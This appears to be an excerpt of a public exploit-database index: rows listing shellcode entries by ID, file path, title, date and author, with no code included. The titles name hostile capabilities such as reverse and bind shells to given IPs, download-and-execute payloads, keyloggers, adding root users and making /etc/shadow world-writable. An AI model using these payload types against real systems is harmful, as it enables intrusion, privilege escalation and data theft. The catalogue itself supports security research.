466 34592 shellcodes/linux_x86/34592.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) 2014-09-09 Ali Razmjoo shellcode linux_x86
467 34667 shellcodes/linux_x86-64/34667.c Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes) Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) 2014-09-15 MadMouse shellcode linux_x86-64
468 34778 shellcodes/linux_x86/34778.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes) 2014-09-25 Javier Tejedor shellcode linux_x86
469 35205 shellcodes/linux_x86-64/35205.txt Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes) 2014-11-10 Breaking.Technology shellcode linux_x86-64
470 35519 shellcodes/linux_x86/35519.txt Linux/x86 - rmdir Shellcode (37 bytes) 2014-12-11 kw4 shellcode linux_x86
471 35586 shellcodes/linux_x86-64/35586.c Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
472 35587 shellcodes/linux_x86-64/35587.c Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
473 35793 shellcodes/windows_x86/35793.txt Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86
474 35794 shellcodes/windows_x86-64/35794.txt Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86-64
475 35868 shellcodes/linux_mips/35868.c Linux/MIPS - execve /bin/sh Shellcode (36 bytes) 2015-01-22 Sanguine shellcode linux_mips
481 36393 shellcodes/linux_x86/36393.c Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
482 36394 shellcodes/linux_x86/36394.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
483 36395 shellcodes/linux_x86/36395.c Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
484 36397 shellcodes/linux_x86/36397.c Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes) Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
485 36398 shellcodes/linux_x86/36398.c Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes) Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
486 36637 shellcodes/linux_x86/36637.c Linux/x86 - Disable ASLR Security Shellcode (84 bytes) 2015-04-03 Mohammad Reza Ramezani shellcode linux_x86
487 36672 shellcodes/linux_x86/36672.asm Linux/x86 - Egghunter Shellcode (20 bytes) 2015-04-08 Paw Petersen shellcode linux_x86
488 36673 shellcodes/generator/36673.py Linux/x86 - Typewriter Shellcode (Generator) 2015-04-08 Paw Petersen shellcode generator
494 36781 shellcodes/generator/36781.py Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator) 2015-04-17 Konstantinos Alexiou shellcode generator
495 36857 shellcodes/linux_x86/36857.c Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes) 2015-04-29 noviceflux shellcode linux_x86
496 36858 shellcodes/linux_x86-64/36858.c Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes) 2015-04-29 noviceflux shellcode linux_x86-64
497 36921 shellcodes/linux_x86/36921.c Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes) Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes) 2015-05-06 Oleg Boytsev shellcode linux_x86
498 36908 shellcodes/linux_x86/36908.c Linux/x86 - exit(0) Shellcode (6 bytes) 2015-05-04 Febriyanto Nugroho shellcode linux_x86
499 37069 shellcodes/linux_x86/37069.c Linux/x86 - execve /bin/sh Shellcode (26 bytes) 2015-05-20 Reza Behzadpour shellcode linux_x86
500 37251 shellcodes/linux_x86/37251.asm Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1) 2015-06-10 B3mB4m shellcode linux_x86
502 37289 shellcodes/linux_x86/37289.txt Linux/x86 - Shutdown(init 0) Shellcode (30 bytes) 2015-06-15 B3mB4m shellcode linux_x86
503 37297 shellcodes/linux_x86/37297.txt Linux/x86 - Read /etc/passwd Shellcode (58 bytes) 2015-06-16 B3mB4m shellcode linux_x86
504 37358 shellcodes/linux_x86/37358.c Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) 2015-06-24 B3mB4m shellcode linux_x86
505 37359 shellcodes/linux_x86/37359.c Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes) Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes) 2015-06-24 B3mB4m shellcode linux_x86
506 37362 shellcodes/linux_x86-64/37362.c Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes) 2015-06-24 Bill Borskey shellcode linux_x86-64
507 37365 shellcodes/linux_x86/37365.c Linux/x86 - Download File + Execute Shellcode 2015-06-24 B3mB4m shellcode linux_x86
508 37366 shellcodes/linux_x86/37366.c Linux/x86 - Reboot Shellcode (28 bytes) 2015-06-24 B3mB4m shellcode linux_x86
519 37762 shellcodes/linux_x86/37762.py Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode 2015-08-12 Anastasios Monachos shellcode linux_x86
520 37895 shellcodes/windows_x86-64/37895.asm Windows 2003 x64 - Token Stealing Shellcode (59 bytes) 2015-08-20 Fitzl Csaba shellcode windows_x86-64
521 38065 shellcodes/osx/38065.txt OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes) 2015-09-02 Fitzl Csaba shellcode osx
522 38075 shellcodes/system_z/38075.txt Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes) Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes) 2015-09-02 Bigendian Smalls shellcode system_z
523 38088 shellcodes/linux_x86/38088.c Linux/x86 - execve /bin/bash Shellcode (31 bytes) 2015-09-06 Ajith Kp shellcode linux_x86
524 38094 shellcodes/generator/38094.c Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator) 2015-09-07 Ajith Kp shellcode generator
525 38116 shellcodes/linux_x86/38116.c Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes) 2015-09-09 Ajith Kp shellcode linux_x86
526 38126 shellcodes/osx/38126.c OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes) OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes) 2015-09-10 Fitzl Csaba shellcode osx
527 38150 shellcodes/linux_x86-64/38150.txt Linux/x86-64 - execve /bin/sh Shellcode (34 bytes) 2015-09-11 Fanda Uchytil shellcode linux_x86-64
528 38194 shellcodes/android/38194.c Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes) Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes) 2015-09-15 Steven Padilla shellcode android
529 38239 shellcodes/linux_x86-64/38239.asm Linux/x86-64 - execve Shellcode (22 bytes) 2015-09-18 d4sh&r shellcode linux_x86-64
530 38469 shellcodes/linux_x86-64/38469.c Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes) Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) 2015-10-15 d4sh&r shellcode linux_x86-64
531 38708 shellcodes/linux_x86-64/38708.asm Linux/x86-64 - Egghunter Shellcode (24 bytes) 2015-11-16 d4sh&r shellcode linux_x86-64
532 38815 shellcodes/linux_x86-64/38815.c Linux/x86-64 - execve Polymorphic Shellcode (31 bytes) 2015-11-25 d4sh&r shellcode linux_x86-64
533 38959 shellcodes/generator/38959.py Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator) 2015-12-13 B3mB4m shellcode generator
534 39149 shellcodes/linux_x86-64/39149.c Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2016-01-01 Scorpion_ shellcode linux_x86-64
535 39152 shellcodes/linux_x86-64/39152.c Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) 2016-01-02 Sathish kumar shellcode linux_x86-64
536 39160 shellcodes/linux_x86/39160.c Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1) 2016-01-04 Dennis 'dhn' Herrmann shellcode linux_x86
537 39185 shellcodes/linux_x86-64/39185.c Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) 2016-01-06 Sathish kumar shellcode linux_x86-64
538 39203 shellcodes/linux_x86-64/39203.c Linux/x86-64 - Egghunter Shellcode (18 bytes) 2016-01-08 Sathish kumar shellcode linux_x86-64
539 39204 shellcodes/linux_x86/39204.c Linux/x86 - Egghunter Shellcode (13 bytes) 2016-01-08 Dennis 'dhn' Herrmann shellcode linux_x86
540 39312 shellcodes/linux_x86-64/39312.c Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes) 2016-01-25 Sathish kumar shellcode linux_x86-64
541 39336 shellcodes/linux/39336.c Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes) Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) 2016-01-27 B3mB4m shellcode linux
542 39337 shellcodes/linux/39337.c Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes) Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) 2016-01-27 B3mB4m shellcode linux
543 39338 shellcodes/linux/39338.c Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes) 2016-01-27 B3mB4m shellcode linux
544 39383 shellcodes/linux_x86-64/39383.c Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) 2016-01-29 Sathish kumar shellcode linux_x86-64
545 39388 shellcodes/linux_x86-64/39388.c Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes) Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
546 39389 shellcodes/linux_x86/39389.c Linux/x86 - Download File + Execute Shellcode (135 bytes) 2016-02-01 B3mB4m shellcode linux_x86
547 39390 shellcodes/linux_x86-64/39390.c Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
548 39496 shellcodes/arm/39496.c Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes) Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes) 2016-02-26 Xeon shellcode arm
549 39519 shellcodes/windows_x86/39519.c Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) 2016-03-02 Sean Dillon shellcode windows_x86
550 39578 shellcodes/linux_x86-64/39578.c Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes) Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) 2016-03-21 Sudhanshu Chauhan shellcode linux_x86-64
551 39617 shellcodes/linux_x86-64/39617.c Linux/x86-64 - execve /bin/sh Shellcode (26 bytes) 2016-03-24 Ajith Kp shellcode linux_x86-64
552 39624 shellcodes/linux_x86-64/39624.c Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1) 2016-03-28 Ajith Kp shellcode linux_x86-64
553 39625 shellcodes/linux_x86-64/39625.c Linux/x86-64 - execve /bin/bash Shellcode (33 bytes) 2016-03-28 Ajith Kp shellcode linux_x86-64
554 39684 shellcodes/linux_x86-64/39684.c Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes) Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) 2016-04-11 Ajith Kp shellcode linux_x86-64
555 39700 shellcodes/linux_x86-64/39700.c Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes) 2016-04-15 Ajith Kp shellcode linux_x86-64
556 39718 shellcodes/linux_x86-64/39718.c Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes) Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) 2016-04-21 Ajith Kp shellcode linux_x86-64
557 40094 shellcodes/windows_x86/40094.c Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) 2016-07-13 Roziul Hasan Khan Shifat shellcode windows_x86
558 39722 shellcodes/linux_x86/39722.c Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes) Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
559 39723 shellcodes/linux_x86/39723.c Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes) Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
560 39728 shellcodes/generator/39728.py Linux/x86-64 - Bind TCP Shell Shellcode (Generator) 2016-04-25 Ajith Kp shellcode generator
561 39731 shellcodes/windows/39731.c Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes) 2016-04-25 Fugu shellcode windows
562 39754 shellcodes/windows_x86/39754.txt Windows .Net Framework x86 - Execute Native x86 Shellcode 2016-05-02 Jacky5112 shellcode windows_x86
563 39758 shellcodes/linux_x86-64/39758.c Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes) Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
564 39763 shellcodes/linux_x86-64/39763.c Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes) Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
565 39794 shellcodes/windows/39794.c Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes) 2016-05-10 Fugu shellcode windows
566 39815 shellcodes/generator/39815.c Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator) Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator) 2016-05-16 JollyFrogs shellcode generator
567 39847 shellcodes/linux_x86-64/39847.c Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) 2016-05-23 Roziul Hasan Khan Shifat shellcode linux_x86-64
568 39851 shellcodes/linux_x86/39851.c Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes) Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes) 2016-05-25 Brandon Dennis shellcode linux_x86
569 39869 shellcodes/linux_x86-64/39869.c Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes) 2016-05-30 Roziul Hasan Khan Shifat shellcode linux_x86-64
570 39885 shellcodes/multiple/39885.c BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) 2016-06-06 odzhancode shellcode multiple
571 39900 shellcodes/windows_x86/39900.c Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) 2016-06-07 Roziul Hasan Khan Shifat shellcode windows_x86
572 39901 shellcodes/linux_x86/39901.c Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes) Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes) 2016-06-07 sajith shellcode linux_x86
573 39914 shellcodes/windows_x86/39914.c Windows x86 - system(_systeminfo_) Shellcode (224 bytes) 2016-06-10 Roziul Hasan Khan Shifat shellcode windows_x86
574 39979 shellcodes/windows/39979.c Windows XP < 10 - Download File + Execute Shellcode 2016-06-20 B3mB4m shellcode windows
575 40005 shellcodes/windows_x86/40005.c Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) 2016-06-22 Roziul Hasan Khan Shifat shellcode windows_x86
576 40026 shellcodes/linux_x86/40026.txt Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode 2016-06-27 Pawan Lal shellcode linux_x86
577 40029 shellcodes/linux_x86-64/40029.c Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes) Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) 2016-06-28 Roziul Hasan Khan Shifat shellcode linux_x86-64
578 40052 shellcodes/linux_x86-64/40052.c Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes) Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) 2016-07-04 Kyzer shellcode linux_x86-64
579 40056 shellcodes/linux_x86/40056.c Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes) Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes) 2016-07-04 sajith shellcode linux_x86
580 40061 shellcodes/linux_x86-64/40061.c Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes) 2016-07-06 Kyzer shellcode linux_x86-64
581 40075 shellcodes/linux_x86/40075.c Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes) Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes) 2016-07-08 sajith shellcode linux_x86
582 40079 shellcodes/linux_x86-64/40079.c Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes) Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) 2016-07-11 Kyzer shellcode linux_x86-64
583 40110 shellcodes/linux_x86/40110.c Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes) 2016-07-13 RTV shellcode linux_x86
584 40122 shellcodes/linux_x86-64/40122.txt Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) 2016-07-19 Kyzer shellcode linux_x86-64
585 40128 shellcodes/linux_crisv32/40128.c Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes) Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes) 2016-07-20 bashis shellcode linux_crisv32
586 40131 shellcodes/linux_x86/40131.c Linux/x86 - execve /bin/sh Shellcode (19 bytes) 2016-07-20 sajith shellcode linux_x86
587 40139 shellcodes/linux_x86-64/40139.c Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes) Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) 2016-07-21 Kyzer shellcode linux_x86-64
588 40175 shellcodes/windows_x86/40175.c Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes) 2016-07-29 Roziul Hasan Khan Shifat shellcode windows_x86
589 40179 shellcodes/linux_x86/40179.c Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes) 2016-07-29 Kyzer shellcode linux_x86
590 40222 shellcodes/linux_x86/40222.c Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes) Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes) 2016-08-10 thryb shellcode linux_x86
591 40223 shellcodes/linux_x86/40223.c Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes) Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes) 2016-08-10 thryb shellcode linux_x86
592 40245 shellcodes/windows_x86/40245.c Windows x86 - MessageBoxA Shellcode (242 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
593 40246 shellcodes/windows_x86/40246.c Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
594 40259 shellcodes/windows_x86/40259.c Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes) 2016-08-18 Roziul Hasan Khan Shifat shellcode windows_x86
595 43562 shellcodes/linux_x86-64/43562.c Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
596 43563 shellcodes/linux_x86-64/43563.c Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
597 43564 shellcodes/linux_x86-64/43564.c Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
598 43565 shellcodes/linux_x86-64/43565.asm Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes) 2009-01-01 Mr.Un1k0d3r shellcode linux_x86-64
599 43566 shellcodes/linux_x86-64/43566.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
600 43568 shellcodes/linux_x86-64/43568.asm Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
601 43570 shellcodes/linux_x86-64/43570.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
602 43597 shellcodes/linux_x86-64/43597.c Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes) 2009-01-01 Geyslan G. Bem shellcode linux_x86-64
603 43598 shellcodes/linux_x86-64/43598.c Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
604 43599 shellcodes/linux_x86-64/43599.c Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
605 43601 shellcodes/linux_x86-64/43601.asm Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes) 2009-01-01 Gaussillusion shellcode linux_x86-64
606 43602 shellcodes/linux_x86-64/43602.asm Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes) 2009-01-01 Gaussillusion shellcode linux_x86-64
607 43603 shellcodes/linux_x86-64/43603.c Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
608 43604 shellcodes/linux_x86-64/43604.c Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
609 43605 shellcodes/linux_x86-64/43605.c Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
610 43606 shellcodes/linux_x86-64/43606.c Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
611 43607 shellcodes/linux_x86-64/43607.c Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes) 2009-01-01 zbt shellcode linux_x86-64
612 43608 shellcodes/openbsd_x86/43608.c OpenBSD/x86 - reboot() Shellcode (15 bytes) 2009-01-01 beosroot shellcode openbsd_x86
613 40549 shellcodes/windows_x86-64/40549.c Windows x64 - cmd.exe WinExec() Shellcode (93 bytes) 2016-10-17 Roziul Hasan Khan Shifat shellcode windows_x86-64
614 40560 shellcodes/windows_x86/40560.asm Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) 2016-10-17 Fugu shellcode windows_x86
615 40781 shellcodes/windows_x86-64/40781.c Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes) Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) 2016-11-18 Roziul Hasan Khan Shifat shellcode windows_x86-64
616 40808 shellcodes/linux_x86-64/40808.c Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes) 2016-11-22 Ashiyane Digital Security Team shellcode linux_x86-64
617 40821 shellcodes/windows_x86-64/40821.c Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) 2016-11-23 Roziul Hasan Khan Shifat shellcode windows_x86-64
618 40872 shellcodes/linux_x86/40872.c Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) 2016-12-05 Filippo Bersani shellcode linux_x86
619 40924 shellcodes/linux_x86/40924.c Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes) 2016-12-16 Filippo Bersani shellcode linux_x86
620 40981 shellcodes/windows_x86-64/40981.c Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes) Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) 2017-01-01 Roziul Hasan Khan Shifat shellcode windows_x86-64
621 41072 shellcodes/windows_x86-64/41072.c Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) 2017-01-15 Roziul Hasan Khan Shifat shellcode windows_x86-64
622 41089 shellcodes/linux_x86-64/41089.c Linux/x86-64 - mkdir Shellcode (25 bytes) 2017-01-18 Ajith Kp shellcode linux_x86-64
